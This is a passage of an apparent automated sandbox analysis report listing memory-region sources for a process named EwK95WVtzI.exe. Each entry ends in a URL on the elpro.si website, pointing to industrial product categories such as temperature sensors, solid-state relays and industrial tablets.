                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/merilni-pretvornik
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/profesionalni-seti
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/resitve-za-asfalte
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/resitve-za-krusno-
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/tipala-za-meritve-
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/elpro-storitve/
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/fiksni-detektorji-wireless/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/fiksni-detektorji-wireless/nadzorne-enote-fiksni-detektorji-
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/grelci-polprevodniski-releji-ssr-in-tiristorji/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/grelci-polprevodniski-releji-ssr-in-tiristorji/hladilniki-za
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/grelci-polprevodniski-releji-ssr-in-tiristorji/ssr-rele-polp
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/grelci-polprevodniski-releji-ssr-in-tiristorji/tiristorski-r
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/industrijske-tablice-telefoni-handheld/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/industrijske-tablice-telefoni-handheld/dodatna-oprema-za-ind
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/industrijske-tablice-telefoni-handheld/industrijske-tablice/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 